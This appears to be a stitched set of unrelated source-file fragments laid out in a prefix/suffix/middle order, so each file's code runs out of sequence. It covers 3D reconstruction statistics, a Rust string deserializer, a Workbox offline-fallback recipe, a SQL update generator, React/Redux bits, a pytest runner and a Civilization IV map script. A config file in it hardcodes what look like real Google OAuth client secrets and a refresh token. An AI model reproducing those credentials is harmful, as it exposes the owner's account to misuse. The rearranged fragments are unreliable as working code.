convert_to_rounded_float = lambda x: float(np.round(x, 3))
stats_dict = {}
stats_dict["number_tracks"] = self.number_tracks()
stats_dict["3d_track_lengths"] = {
"min": convert_to_rounded_float(track_lengths_3d.min()),
"mean": convert_to_rounded_float(np.mean(track_lengths_3d)),
"median": convert_to_rounded_float(np.median(track_lengths_3d)),
"max": convert_to_rounded_float(track_lengths_3d.max()),
}
stats_dict["reprojection_errors"] = {
"min": convert_to_rounded_float(np.min(scene_reproj_errors)),
"mean": convert_to_rounded_float(np.mean(scene_reproj_errors)),
"median": convert_to_rounded_float(np.median(scene_reproj_errors)),
"max": convert_to_rounded_float(np.max(scene_reproj_errors)),
}
return stats_dict
def get_avg_scene_reprojection_error(self) -> float:
"""Get average reprojection error for all 3d points in the entire scene
Returns:
Average of reprojection errors for every 3d point to its 2d measurements
"""
scene_reproj_errors = self.get_scene_reprojection_errors()
scene_avg_reproj_error = np.mean(scene_reproj_errors)
return scene_avg_reproj_error
def log_scene_reprojection_error_stats(self) -> None:
"""Logs reprojection error stats for all 3d points in the entire scene."""
scene_reproj_errors = self.get_scene_reprojection_errors()
logger.info("Min scene reproj error: %.3f", np.min(scene_reproj_errors))
logger.info("Avg scene reproj error: %.3f", np.mean(scene_reproj_errors))
logger.info("Median scene reproj error: %.3f", np.median(scene_reproj_errors))
logger.info("Max scene reproj error: %.3f", np.max(scene_reproj_errors))
def __validate_track(self, track: SfmTrack, reproj_err_thresh: float) -> bool:
"""Validates a track based on reprojection errors and cheirality checks.
Args:
track: track with 3D landmark and measurements.
reproj_err_thresh: reprojection err threshold for each measurement.
Returns:
validity of the track.
"""
errors, avg_reproj_error = reproj_utils.compute_track_reprojection_errors(self._cameras, track)
# track is valid as all measurements have error below the threshold
cheirality_success = np.all(~np.isnan(errors))
return np.all(errors < reproj_err_thresh) and cheirality_success
def filter_landmarks(self, reproj_err_thresh: float = 5) -> "GtsfmData":
"""Filters out landmarks with high reprojection error
Args:
reproj_err_thresh: reprojection err threshold for each measurement.
"""
# TODO: move this function to utils or GTSAM
filtered_data = GtsfmData(self.number_images())
# add all the cameras
for i in self.get_valid_camera_indices():
filtered_data.add_camera(i, self.get_camera(i))
for j in range(self.number_tracks()):
track = self.get_track(j)
if self.__validate_track(track, reproj_err_thresh):
filtered_data.add_track(track)
return filtered_data
| """Get the scene reprojection errors for all 3D points and all associated measurements.
Returns:
Reprojection errors as a 1D numpy array.
"""
scene_reproj_errors: List[float] = []
for track in self._tracks:
track_errors, _ = reproj_utils.compute_track_reprojection_errors(self._cameras, track)
scene_reproj_errors.extend(track_errors)
return np.array(scene_reproj_errors) |
string.rs | // Copyright 2021 Datafuse Labs.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::io::Read;
use common_exception::ErrorCode;
use common_exception::Result;
use common_io::prelude::*;
use crate::prelude::*;
pub struct StringDeserializer {
pub buffer: Vec<u8>,
pub builder: MutableStringColumn,
}
impl StringDeserializer {
pub fn with_capacity(capacity: usize) -> Self {
Self {
buffer: Vec::new(),
builder: MutableStringColumn::with_capacity(capacity),
}
}
}
impl TypeDeserializer for StringDeserializer {
// See GroupHash.rs for StringColumn
#[allow(clippy::uninit_vec)]
fn de_binary(&mut self, reader: &mut &[u8]) -> Result<()> {
let offset: u64 = reader.read_uvarint()?;
self.buffer.clear();
self.buffer.reserve(offset as usize);
unsafe {
self.buffer.set_len(offset as usize);
}
reader.read_exact(&mut self.buffer)?;
self.builder.append_value(&self.buffer);
Ok(())
}
fn de_default(&mut self) {
self.builder.append_value("");
}
fn de_fixed_binary_batch(&mut self, reader: &[u8], step: usize, rows: usize) -> Result<()> {
for row in 0..rows {
let reader = &reader[step * row..];
self.builder.append_value(reader);
}
Ok(())
}
fn de_json(&mut self, value: &serde_json::Value) -> Result<()> |
fn de_text_quoted<R: BufferRead>(&mut self, reader: &mut CheckpointReader<R>) -> Result<()> {
self.buffer.clear();
reader.read_quoted_text(&mut self.buffer, b'\'')?;
self.builder.append_value(self.buffer.as_slice());
Ok(())
}
fn de_whole_text(&mut self, reader: &[u8]) -> Result<()> {
self.builder.append_value(reader);
Ok(())
}
fn de_text<R: BufferRead>(&mut self, reader: &mut CheckpointReader<R>) -> Result<()> {
self.buffer.clear();
reader.read_escaped_string_text(&mut self.buffer)?;
self.builder.append_value(self.buffer.as_slice());
Ok(())
}
fn append_data_value(&mut self, value: DataValue) -> Result<()> {
self.builder.append_data_value(value)
}
fn pop_data_value(&mut self) -> Result<DataValue> {
self.builder.pop_data_value()
}
fn finish_to_column(&mut self) -> ColumnRef {
self.builder.to_column()
}
}
| {
match value {
serde_json::Value::String(s) => {
self.builder.append_value(s);
Ok(())
}
_ => Err(ErrorCode::BadBytes("Incorrect json value, must be string")),
}
} |
offlineFallback.ts | /*
Copyright 2020 Google LLC
Use of this source code is governed by an MIT-style
license that can be found in the LICENSE file or at
https://opensource.org/licenses/MIT.
*/
import {setCatchHandler} from 'workbox-routing/setCatchHandler.js';
import {matchPrecache} from 'workbox-precaching/matchPrecache.js';
import {RouteHandler, RouteHandlerCallbackOptions} from 'workbox-core/types.js';
import './_version.js';
export interface OfflineFallbackOptions {
pageFallback?: string;
imageFallback?: string;
fontFallback?: string;
}
// Give TypeScript the correct global.
declare let self: ServiceWorkerGlobalScope;
/**
* An implementation of the [comprehensive fallbacks recipe]{@link https://developers.google.com/web/tools/workbox/guides/advanced-recipes#comprehensive_fallbacks}. Be sure to include the fallbacks in your precache injection
*
* @memberof module:workbox-recipes
*
* @param {Object} [options]
* @param {string} [options.pageFallback] Precache name to match for pag fallbacks. Defaults to offline.html
* @param {string} [options.imageFallback] Precache name to match for image fallbacks.
* @param {string} [options.fontFallback] Precache name to match for font fallbacks.
*/
function | (options: OfflineFallbackOptions = {}): void {
const pageFallback = options.pageFallback || 'offline.html';
const imageFallback = options.imageFallback || false;
const fontFallback = options.fontFallback || false;
self.addEventListener('install', event => {
const files = [pageFallback];
if (imageFallback) {
files.push(imageFallback);
}
if (fontFallback) {
files.push(fontFallback);
}
event.waitUntil(self.caches.open('workbox-offline-fallbacks').then(cache => cache.addAll(files)));
});
const handler: RouteHandler = async (
options: RouteHandlerCallbackOptions
) => {
const dest = options.request.destination;
const cache = await self.caches.open('workbox-offline-fallbacks');
if (dest === "document") {
const match = await matchPrecache(pageFallback) || await cache.match(pageFallback);
return match || Response.error();
}
if (dest === "image" && imageFallback !== false) {
const match = await matchPrecache(imageFallback) || await cache.match(imageFallback);
return match || Response.error();
}
if (dest === "font" && fontFallback !== false) {
const match = await matchPrecache(fontFallback) || await cache.match(fontFallback);
return match || Response.error();
}
return Response.error();
};
setCatchHandler(handler);
}
export { offlineFallback }
| offlineFallback |
updateIO.ts | import * as mm from 'mingru-models';
import { throwIfFalsy } from 'throw-if-arg-empty';
import { Dialect, StringSegment } from '../dialect.js';
import { settersToVarList, SetterIO } from './setterIO.js';
import { SQLIO, sqlIO } from './sqlIO.js';
import { ActionIO } from './actionIO.js';
import VarList from '../lib/varList.js';
import { VarInfo } from '../lib/varInfo.js';
import { registerHandler } from './actionToIO.js';
import * as defs from '../defs.js';
import * as utils from '../lib/stringUtils.js';
import { forEachWithSlots } from '../lib/arrayUtils.js';
import BaseIOProcessor from './baseIOProcessor.js';
import { ActionToIOOptions } from './actionToIOOptions.js';
import { handleNonSelectSQLFrom } from '../lib/sqlHelper.js';
export class UpdateIO extends ActionIO {
constructor(
dialect: Dialect,
public updateAction: mm.UpdateAction,
sql: StringSegment[],
public setters: SetterIO[],
public where: SQLIO | null,
funcArgs: VarList,
execArgs: VarList,
returnValues: VarList,
public setterArgs: VarList,
) {
super(dialect, updateAction, sql, funcArgs, execArgs, returnValues);
throwIfFalsy(updateAction, 'updateAction');
throwIfFalsy(sql, 'sql');
throwIfFalsy(setters, 'setters');
}
}
class UpdateIOProcessor extends BaseIOProcessor {
constructor(public action: mm.UpdateAction, opt: ActionToIOOptions) {
super(action, opt);
}
convert(): UpdateIO {
const sql: StringSegment[] = ['UPDATE '];
const { action, opt } = this;
const { dialect } = opt;
const actionData = action.__getData();
const sqlTable = this.mustGetAvailableSQLTable();
if (!actionData.whereSQLValue && !actionData.unsafeMode) {
throw new Error(
'You have to call `unsafeUpdateAll` to build an action without a WHERE clause',
);
}
// FROM
const fromSQL = handleNonSelectSQLFrom(this, sqlTable);
sql.push(...fromSQL);
sql.push(' SET ');
// Setters
if (actionData.setters) {
utils.validateSetters(actionData.setters, sqlTable);
}
const setterIOs = SetterIO.fromAction(action, dialect, true, sqlTable);
forEachWithSlots(
setterIOs,
(setter) => {
sql.push(`${dialect.encodeColumnName(setter.col)} = `);
sql.push(...setter.sql.code);
},
() => sql.push(', '),
);
// WHERE
const whereIO = actionData.whereSQLValue
? sqlIO(actionData.whereSQLValue, dialect, sqlTable)
: null;
if (whereIO) {
sql.push(' WHERE ');
sql.push(...whereIO.code);
}
// funcArgs
const setterVars = settersToVarList(`SetterInputs of action "${action}"`, setterIOs);
const funcArgs = new VarList(`Func args of action "${action}"`, true);
funcArgs.add(defs.dbxQueryableVar);
if (this.isFromTableInput()) {
funcArgs.add(defs.tableInputVar);
}
const execArgs = new VarList(`Exec args of action "${action}"`, true);
// funcArgs = WHERE(distinct) + setters
// execArgs = setters + WHERE(all)
execArgs.merge(setterVars.list);
if (whereIO) {
funcArgs.merge(whereIO.distinctVars);
execArgs.merge(whereIO.vars);
}
funcArgs.merge(setterVars.list);
// Return values
const returnValues = new VarList(`Return values of action "${action}"`);
if (!actionData.ensureOneRowAffected) {
returnValues.add(
new VarInfo(mm.ReturnValues.rowsAffected, dialect.colTypeToGoType(mm.int().__type())),
);
}
return new UpdateIO(
dialect,
action,
sql,
setterIOs,
whereIO,
funcArgs,
execArgs,
returnValues,
setterVars,
);
}
}
export function updateIO(action: mm.Action, opt: ActionToIOOptions): UpdateIO { |
registerHandler(mm.ActionType.update, updateIO); | const pro = new UpdateIOProcessor(action as mm.UpdateAction, opt);
return pro.convert();
} |
ReloadCircle.d.ts | export default ReloadCircle;
declare function ReloadCircle({ height, width, style, color, cssClasses, className, onClick }: {
height?: number;
width?: number;
style?: {};
color?: string;
cssClasses?: string;
className?: string; | onClick?: () => any;
}): any; | |
config_20211124124615.js | module.exports = {
clientID: '331097077110-5kduv74likju63dq4itceaif7edv7b62.apps.googleusercontent.com',
clientSecret: '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', | refreshToken: '1//04F-2hQjgCwmqCgYIARAAGAQSNwF-L9Irl2zywzaF3mev7nvpJ4z9Cq1dl56Aw5VIPc199ga56QIA3N83MtBiivKjg3t4UP6DS2k',
usr: ''
} | |
RadioButtonPanelContainer.js | import { bindActionCreators } from 'redux';
import { connect } from 'react-redux';
import { changePeriod } from '../../../../../actions/exchangeActions';
import RadioButtonPanel from '../components/RadioButtonPanel';
const mapStateToProps = ({ exchange: { period } }) => ({
period,
});
const mapDispatchToProps = dispatch => bindActionCreators({
changePeriod: period => changePeriod(period),
}, dispatch);
export default connect(
mapStateToProps, | mapDispatchToProps,
)(RadioButtonPanel); |
|
run_all.py | import os.path
import sys
import pytest
TEST_ROOT = os.path.dirname(__file__)
SRC_ROOT = os.path.dirname(TEST_ROOT) | if __name__ == '__main__':
sys.path.insert(1, DATASCIENCE_ROOT)
ec = pytest.main([
'--rootdir', SRC_ROOT,
TEST_ROOT,
])
sys.exit(ec) | DATASCIENCE_ROOT = os.path.join(SRC_ROOT, 'datascience')
|
Fantasy_Realm.py | #
# FILE: Fantasy_Realm.py
# AUTHOR: Bob Thomas (Sirian)
# PURPOSE: Regional map script - Fantastical terrain, X and Y Wrap
#-----------------------------------------------------------------------------
# Copyright (c) 2005 Firaxis Games, Inc. All rights reserved.
#-----------------------------------------------------------------------------
#
from CvPythonExtensions import *
import CvUtil
import CvMapGeneratorUtil
import random
import sys
from CvMapGeneratorUtil import FractalWorld
from CvMapGeneratorUtil import TerrainGenerator
from CvMapGeneratorUtil import FeatureGenerator
def getDescription():
return "TXT_KEY_MAP_SCRIPT_FANTASY_REALM_DESCR"
def isAdvancedMap():
"This map should not show up in simple mode"
return 1
def getNumCustomMapOptions():
return 2
def getNumHiddenCustomMapOptions():
return 1
def getCustomMapOptionName(argsList):
[iOption] = argsList
option_names = {
0: "TXT_KEY_MAP_SCRIPT_RESOURCE_APPEARANCE",
1: "TXT_KEY_MAP_WORLD_WRAP"
}
translated_text = unicode(CyTranslator().getText(option_names[iOption], ()))
return translated_text
def getNumCustomMapOptionValues(argsList):
[iOption] = argsList
option_values = {
0: 3,
1: 3
}
return option_values[iOption]
def getCustomMapOptionDescAt(argsList):
[iOption, iSelection] = argsList
selection_names = {
0: {
0: "TXT_KEY_MAP_SCRIPT_LOGICAL",
1: "TXT_KEY_MAP_SCRIPT_IRRATIONAL",
2: "TXT_KEY_MAP_SCRIPT_CRAZY"
},
1: {
0: "TXT_KEY_MAP_WRAP_FLAT",
1: "TXT_KEY_MAP_WRAP_CYLINDER",
2: "TXT_KEY_MAP_WRAP_TOROID"
}
}
translated_text = unicode(CyTranslator().getText(selection_names[iOption][iSelection], ()))
return translated_text
def getCustomMapOptionDefault(argsList):
[iOption] = argsList
option_defaults = {
0: 1,
1: 2
}
return option_defaults[iOption]
def isRandomCustomMapOption(argsList):
[iOption] = argsList
option_random = {
0: false,
1: false
}
return option_random[iOption]
def getWrapX():
map = CyMap()
return (map.getCustomMapOption(1) == 1 or map.getCustomMapOption(1) == 2)
def getWrapY():
map = CyMap()
return (map.getCustomMapOption(1) == 2)
def isClimateMap():
return 0
def isBonusIgnoreLatitude():
return True
def getGridSize(argsList):
"Because this is such a land-heavy map, override getGridSize() to make the map smaller"
grid_sizes = {
WorldSizeTypes.WORLDSIZE_DUEL: (6,4),
WorldSizeTypes.WORLDSIZE_TINY: (8,5),
WorldSizeTypes.WORLDSIZE_SMALL: (10,6),
WorldSizeTypes.WORLDSIZE_STANDARD: (13,8),
WorldSizeTypes.WORLDSIZE_LARGE: (16,10),
WorldSizeTypes.WORLDSIZE_HUGE: (21,13)
}
if (argsList[0] == -1): # (-1,) is passed to function on loads
return []
[eWorldSize] = argsList
return grid_sizes[eWorldSize]
def minStartingDistanceModifier():
return -25
def findStartingArea(argsList):
"make sure all players are on the biggest area"
[playerID] = argsList
gc = CyGlobalContext()
return gc.getMap().findBiggestArea(False).getID()
def beforeGeneration():
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game
global eliminated_resources, crazy_types
eliminated_resources = []
crazy_types = []
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources != 2:
return
# Set up "Crazy" resources.
food_list = ['BONUS_BANANA', 'BONUS_CORN', 'BONUS_PIG', 'BONUS_RICE', 'BONUS_SHEEP', 'BONUS_WHEAT']
luxury_list = ['BONUS_GEMS', 'BONUS_GOLD', 'BONUS_INCENSE', 'BONUS_SILK', 'BONUS_SILVER', 'BONUS_WINE']
strategic_list = ['BONUS_COPPER', 'BONUS_HORSE', 'BONUS_IRON', 'BONUS_IVORY', 'BONUS_MARBLE', 'BONUS_STONE']
late_list = ['BONUS_ALUMINUM', 'BONUS_COAL', 'BONUS_OIL', 'BONUS_URANIUM']
sea_list = ['BONUS_CLAM', 'BONUS_CRAB', 'BONUS_FISH', 'BONUS_WHALE']
leftovers_list = ['BONUS_DYE', 'BONUS_FUR', 'BONUS_SPICES', 'BONUS_SUGAR', 'BONUS_COW', 'BONUS_DEER']
# Choose the four "Crazy" resources.
gc = CyGlobalContext()
dice = gc.getGame().getMapRand()
foodRoll = dice.get(6, "Crazy Food - Fantasy Realm PYTHON")
crazy_food = food_list[foodRoll]
del food_list[foodRoll]
luxuryRoll = dice.get(6, "Crazy Luxury - Fantasy Realm PYTHON")
crazy_luxury = luxury_list[luxuryRoll]
del luxury_list[luxuryRoll]
strategicRoll = dice.get(6, "Crazy Strategic - Fantasy Realm PYTHON")
crazy_strategic = strategic_list[strategicRoll]
del strategic_list[strategicRoll]
lateRoll = dice.get(4, "Crazy Late Game - Fantasy Realm PYTHON")
crazy_late_game = late_list[lateRoll]
del late_list[lateRoll]
# Now choose the EIGHT (8!) resources that will not appear at all in this game!
for loopy in range(2):
foodRoll = dice.get(len(food_list), "Eliminated Food - Fantasy Realm PYTHON")
eliminated_resources.append(food_list[foodRoll])
del food_list[foodRoll]
luxuryRoll = dice.get(len(luxury_list), "Eliminated Luxury - Fantasy Realm PYTHON")
eliminated_resources.append(luxury_list[luxuryRoll])
del luxury_list[luxuryRoll]
strategicRoll = dice.get(len(strategic_list), "Eliminated Strategic - Fantasy Realm PYTHON")
eliminated_resources.append(strategic_list[strategicRoll])
del strategic_list[strategicRoll]
lateRoll = dice.get(3, "Eliminated Late Game - Fantasy Realm PYTHON")
eliminated_resources.append(late_list[lateRoll])
del late_list[lateRoll]
seaRoll = dice.get(4, "Eliminated Sea - Fantasy Realm PYTHON")
eliminated_resources.append(sea_list[seaRoll])
del sea_list[seaRoll]
# Crazy variables all finished.
return
# Subclass
class FantasyFractalWorld(CvMapGeneratorUtil.FractalWorld):
def initFractal(self, continent_grain = 2, rift_grain = 2,
has_center_rift = True, invert_heights = False):
"For no rifts, use rift_grain = -1"
iFlags = 0
if invert_heights:
iFlags = iFlags | CyFractal.FracVals.FRAC_INVERT_HEIGHTS
if rift_grain >= 0:
self.riftsFrac = CyFractal()
self.riftsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, rift_grain, self.mapRand, iFlags, self.fracXExp, self.fracYExp)
if has_center_rift:
iFlags = iFlags | CyFractal.FracVals.FRAC_CENTER_RIFT
self.continentsFrac.fracInitRifts(self.iNumPlotsX, self.iNumPlotsY, continent_grain, self.mapRand, iFlags, self.riftsFrac, self.fracXExp, self.fracYExp)
else:
self.continentsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, continent_grain, self.mapRand, iFlags, self.fracXExp, self.fracYExp)
def generatePlotTypes(self, water_percent=9, shift_plot_types=True,
grain_amount=3):
# Check for changes to User Input variances.
self.checkForOverrideDefaultUserInputVariances()
self.hillsFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, grain_amount, self.mapRand, 0, self.fracXExp, self.fracYExp)
self.peaksFrac.fracInit(self.iNumPlotsX, self.iNumPlotsY, grain_amount+1, self.mapRand, 0, self.fracXExp, self.fracYExp)
water_percent += self.seaLevelChange
water_percent = min(water_percent, 14)
water_percent = max(water_percent, 7)
iWaterThreshold = self.continentsFrac.getHeightFromPercent(water_percent)
iHillsBottom1 = self.hillsFrac.getHeightFromPercent(max((self.hillGroupOneBase - self.hillGroupOneRange), 0))
iHillsTop1 = self.hillsFrac.getHeightFromPercent(min((self.hillGroupOneBase + self.hillGroupOneRange), 100))
iHillsBottom2 = self.hillsFrac.getHeightFromPercent(max((self.hillGroupTwoBase - self.hillGroupTwoRange), 0))
iHillsTop2 = self.hillsFrac.getHeightFromPercent(min((self.hillGroupTwoBase + self.hillGroupTwoRange), 100))
iPeakThreshold = self.peaksFrac.getHeightFromPercent(self.peakPercent)
for x in range(self.iNumPlotsX):
for y in range(self.iNumPlotsY):
i = y*self.iNumPlotsX + x
val = self.continentsFrac.getHeight(x,y)
if val <= iWaterThreshold:
self.plotTypes[i] = PlotTypes.PLOT_OCEAN
else:
hillVal = self.hillsFrac.getHeight(x,y)
if ((hillVal >= iHillsBottom1 and hillVal <= iHillsTop1) or (hillVal >= iHillsBottom2 and hillVal <= iHillsTop2)):
peakVal = self.peaksFrac.getHeight(x,y)
if (peakVal <= iPeakThreshold):
self.plotTypes[i] = PlotTypes.PLOT_PEAK
else:
self.plotTypes[i] = PlotTypes.PLOT_HILLS
else:
self.plotTypes[i] = PlotTypes.PLOT_LAND
if shift_plot_types:
self.shiftPlotTypes()
return self.plotTypes
def generatePlotTypes():
"generate a very grainy world for lots of little lakes"
NiTextOut("Setting Plot Types (Python Fantasy Realm) ...")
global fractal_world
fractal_world = FantasyFractalWorld()
fractal_world.initFractal(continent_grain = 3, rift_grain = -1, has_center_rift = False, invert_heights = True)
plot_types = fractal_world.generatePlotTypes(water_percent = 10)
return plot_types
# subclass TerrainGenerator to redefine everything. This is a regional map.
class FantasyTerrainGenerator(CvMapGeneratorUtil.TerrainGenerator):
def __init__(self, fracXExp=-1, fracYExp=-1):
self.gc = CyGlobalContext()
self.map = CyMap()
self.grain_amount = 7
self.iWidth = self.map.getGridWidth()
self.iHeight = self.map.getGridHeight()
self.mapRand = self.gc.getGame().getMapRand()
self.iFlags = 0 # Disallow FRAC_POLAR flag, to prevent "zero row" problems.
self.fantasy=CyFractal()
self.fracXExp = fracXExp
self.fracYExp = fracYExp
self.initFractals()
def initFractals(self):
self.fantasy.fracInit(self.iWidth, self.iHeight, self.grain_amount, self.mapRand, self.iFlags, self.fracXExp, self.fracYExp)
self.iTen = self.fantasy.getHeightFromPercent(10)
self.iTwenty = self.fantasy.getHeightFromPercent(20)
self.iTwentySeven = self.fantasy.getHeightFromPercent(27)
self.iThirtyFive = self.fantasy.getHeightFromPercent(35)
self.iFortyFive = self.fantasy.getHeightFromPercent(45)
self.iFiftyFive = self.fantasy.getHeightFromPercent(55)
self.iSixtyFive = self.fantasy.getHeightFromPercent(65)
self.iSeventyFive = self.fantasy.getHeightFromPercent(75)
self.iEighty = self.fantasy.getHeightFromPercent(80)
self.iNinety = self.fantasy.getHeightFromPercent(90)
self.terrainDesert = self.gc.getInfoTypeForString("TERRAIN_DESERT")
self.terrainPlains = self.gc.getInfoTypeForString("TERRAIN_PLAINS")
self.terrainGrass = self.gc.getInfoTypeForString("TERRAIN_GRASS")
self.terrainIce = self.gc.getInfoTypeForString("TERRAIN_SNOW")
self.terrainTundra = self.gc.getInfoTypeForString("TERRAIN_TUNDRA")
def generateTerrainAtPlot(self,iX,iY):
if (self.map.plot(iX, iY).isWater()):
return self.map.plot(iX, iY).getTerrainType()
else:
val = self.fantasy.getHeight(iX, iY)
if val >= self.iNinety:
terrainVal = self.terrainIce
elif val >= self.iEighty:
terrainVal = self.terrainGrass
elif val >= self.iSeventyFive:
terrainVal = self.terrainDesert
elif val >= self.iSixtyFive:
terrainVal = self.terrainPlains
elif val >= self.iFiftyFive:
terrainVal = self.terrainTundra
elif val >= self.iFortyFive:
terrainVal = self.terrainGrass
elif val >= self.iThirtyFive:
terrainVal = self.terrainPlains
elif val >= self.iTwentySeven:
terrainVal = self.terrainTundra
elif val >= self.iTwenty:
terrainVal = self.terrainIce
elif val < self.iTen:
terrainVal = self.terrainGrass
else:
terrainVal = self.terrainDesert
if (terrainVal == TerrainTypes.NO_TERRAIN):
return self.map.plot(iX, iY).getTerrainType()
return terrainVal
def generateTerrainTypes():
NiTextOut("Generating Terrain (Python Fantasy Realm) ...")
terraingen = FantasyTerrainGenerator()
terrainTypes = terraingen.generateTerrain()
return terrainTypes
class FantasyFeatureGenerator(CvMapGeneratorUtil.FeatureGenerator):
def __init__(self, iJunglePercent=20, iForestPercent=30,
forest_grain=6, fracXExp=-1, fracYExp=-1):
self.gc = CyGlobalContext()
self.map = CyMap()
self.mapRand = self.gc.getGame().getMapRand()
self.forests = CyFractal()
self.iFlags = 0
self.iGridW = self.map.getGridWidth()
self.iGridH = self.map.getGridHeight()
self.iJunglePercent = iJunglePercent
self.iForestPercent = iForestPercent
self.forest_grain = forest_grain + self.gc.getWorldInfo(self.map.getWorldSize()).getFeatureGrainChange()
self.fracXExp = fracXExp
self.fracYExp = fracYExp
self.__initFractals()
self.__initFeatureTypes()
def __initFractals(self):
self.forests.fracInit(self.iGridW, self.iGridH, self.forest_grain, self.mapRand, self.iFlags, self.fracXExp, self.fracYExp)
self.iJungleLevel = self.forests.getHeightFromPercent(100 - self.iJunglePercent)
self.iForestLevel = self.forests.getHeightFromPercent(self.iForestPercent)
def __initFeatureTypes(self):
self.featureJungle = self.gc.getInfoTypeForString("FEATURE_JUNGLE")
self.featureForest = self.gc.getInfoTypeForString("FEATURE_FOREST")
self.featureOasis = self.gc.getInfoTypeForString("FEATURE_OASIS")
self.featureFlood = self.gc.getInfoTypeForString("FEATURE_FLOOD_PLAINS")
self.featureIce = self.gc.getInfoTypeForString("FEATURE_ICE")
def addFeaturesAtPlot(self, iX, iY):
pPlot = self.map.sPlot(iX, iY)
if pPlot.isPeak(): pass
elif pPlot.isWater():
self.addIceAtPlot(pPlot, iX, iY)
else:
if pPlot.isRiverSide() and pPlot.isFlatlands():
self.addFloodAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addOasisAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addJunglesAtPlot(pPlot, iX, iY)
if (pPlot.getFeatureType() == FeatureTypes.NO_FEATURE):
self.addForestsAtPlot(pPlot, iX, iY)
def addIceAtPlot(self, pPlot, iX, iY):
iceRoll = self.mapRand.get(35, "Add Feature PYTHON")
if iceRoll < 3:
pPlot.setFeatureType(self.featureIce, -1)
def | (self, pPlot, iX, iY):
if pPlot.getTerrainType() == self.gc.getInfoTypeForString("TERRAIN_DESERT") or pPlot.getTerrainType() == self.gc.getInfoTypeForString("TERRAIN_SNOW"):
pPlot.setFeatureType(self.featureFlood, -1)
def addOasisAtPlot(self, pPlot, iX, iY):
if not pPlot.isFreshWater():
if pPlot.getTerrainType() != self.gc.getInfoTypeForString("TERRAIN_GRASS"):
if self.mapRand.get(30, "Add Feature PYTHON") == 23:
pPlot.setFeatureType(self.featureOasis, -1)
def addJunglesAtPlot(self, pPlot, iX, iY):
# Warning: this version of JunglesAtPlot is using the forest fractal!
if (self.forests.getHeight(iX, iY) >= self.iJungleLevel):
pPlot.setFeatureType(self.featureJungle, -1)
def addForestsAtPlot(self, pPlot, iX, iY):
if self.forests.getHeight(iX, iY) <= self.iForestLevel:
varietyRoll = self.mapRand.get(3, "Forest Variety - Fantasy PYTHON")
pPlot.setFeatureType(self.featureForest, varietyRoll)
def addFeatures():
global featuregen
NiTextOut("Adding Features (Python Fantasy Realm) ...")
featuregen = FantasyFeatureGenerator()
featuregen.addFeatures()
return 0
# Init bonus lists.
forcePlacementOnFlats = ('BONUS_GOLD', 'BONUS_SILVER', 'BONUS_COAL', 'BONUS_ALUMINUM')
forcePlacementOnHills = ('BONUS_BANANA', 'BONUS_RICE', 'BONUS_SUGAR', 'BONUS_OIL')
forcePlacementInFloodPlains = ('BONUS_INCENSE')
forcePlacementInJungle = ('BONUS_HORSE', 'BONUS_WHEAT')
forcePlacementInForest = ('BONUS_GOLD', 'BONUS_SILVER', 'BONUS_COAL', 'BONUS_ALUMINUM')
forceNotInGrass = ('BONUS_COW', 'BONUS_CORN', 'BONUS_RICE', 'BONUS_PIG', 'BONUS_IVORY')
forceNotInDesert = ('BONUS_OIL', 'BONUS_STONE', 'BONUS_IRON', 'BONUS_COPPER')
forceNotInSnow = ('BONUS_SILVER', 'BONUS_DEER', 'BONUS_FUR')
forceNotInPlains = ('BONUS_WINE', 'BONUS_SHEEP', 'BONUS_MARBLE', 'BONUS_IVORY')
forceNotInJungle = ('BONUS_BANANA', 'BONUS_SUGAR', 'BONUS_DYE', 'BONUS_OIL', 'BONUS_GEMS')
forceNotInForest = ('BONUS_DEER', 'BONUS_SILK', 'BONUS_SPICES', 'BONUS_URANIUM')
forceNotInFreshWater = ('BONUS_RICE', 'BONUS_CORN', 'BONUS_WHEAT', 'BONUS_SUGAR')
seaResources = ('BONUS_CLAM', 'BONUS_CRAB', 'BONUS_FISH', 'BONUS_WHALE')
def addBonusType(argsList):
[iBonusType] = argsList
gc = CyGlobalContext()
map = CyMap()
userInputResources = map.getCustomMapOption(0)
if userInputResources == 0:
CyPythonMgr().allowDefaultImpl()
return
# Skip eliminated or crazy resources, plus handle sea-based resources in default way.
type_string = gc.getBonusInfo(iBonusType).getType()
global crazy_food, crazy_luxury, crazy_strategic, crazy_late_game
global eliminated_resources
global crazy_types
if userInputResources == 2:
if type_string in eliminated_resources: # None of this type will appear!
return None
if type_string == crazy_food or type_string == crazy_luxury or type_string == crazy_strategic or type_string == crazy_late_game:
crazy_types.append(iBonusType)
return None # Crazy resources will be added in afterGeneration()
if type_string in seaResources:
CyPythonMgr().allowDefaultImpl()
return
# Now place the rest of the resources.
dice = gc.getGame().getMapRand()
iW = map.getGridWidth()
iH = map.getGridHeight()
# init forced-eligibility flags
forceFlats = False
forceHills = False
forceFlood = False
forceJungle = False
forceForest = False
forceNoGrass = False
forceNoDesert = False
forceNoSnow = False
forceNoPlains = False
forceNoJungle = False
forceNoForest = False
forceNoFresh = False
if type_string in forcePlacementOnFlats: forceFlats = True
if type_string in forcePlacementOnHills: forceHills = True
if type_string in forcePlacementInFloodPlains: forceFlood = True
if type_string in forcePlacementInJungle: forceJungle = True
if type_string in forcePlacementInForest: forceForest = True
if type_string in forceNotInGrass: forceNoGrass = True
if type_string in forceNotInDesert: forceNoDesert = True
if type_string in forceNotInSnow: forceNoSnow = True
if type_string in forceNotInPlains: forceNoPlains = True
if type_string in forceNotInJungle: forceNoJungle = True
if type_string in forceNotInForest: forceNoForest = True
if type_string in forceNotInFreshWater: forceNoFresh = True
# determine number of bonuses to place (defined as count)
# size modifier is a fixed component based on world size
sizekey = map.getWorldSize()
sizevalues = {
WorldSizeTypes.WORLDSIZE_DUEL: 1,
WorldSizeTypes.WORLDSIZE_TINY: 1,
WorldSizeTypes.WORLDSIZE_SMALL: 1,
WorldSizeTypes.WORLDSIZE_STANDARD: 2,
